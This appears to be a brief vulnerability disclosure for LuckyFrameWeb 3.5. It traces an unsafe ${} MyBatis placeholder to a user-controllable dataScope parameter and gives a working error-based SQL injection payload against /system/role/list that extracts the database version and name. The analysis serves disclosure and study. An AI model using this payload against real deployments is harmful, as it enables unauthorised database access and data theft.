luckyframeweb3.5 sql inject 1

src/main/resources/mybatis/system/RoleMapper.xml

There is a ${} in this mapper

image

Search selectrolelist to see where the this select id is used:

image

src/main/java/com/luckyframe/project/system/role/controller/RoleController.java

Query role information:

image

Follow up the selectrolelist method to see the specific implementation:

src/main/java/com/luckyframe/project/system/role/service/RoleServiceImpl.java

image

The parameters in the role are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated

image

 

Verification:

Splice URL and parameters according to code:

1
2
3
4

http://127.0.0.1/system/role/list

params[dataScope]

Use error injection to query the database version:

1
2

params[dataScope]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))

image

Select database name:

image

 


声明:
本文章用于学习交流,严禁用于非法操作,出现后果一切自行承担,阅读此文章表示你已同意本声明。

Disclaimer:
This article is for study and communication. It is strictly forbidden to use it for illegal operations. All consequences shall be borne by yourself. Reading this article means that you have agreed to this statement.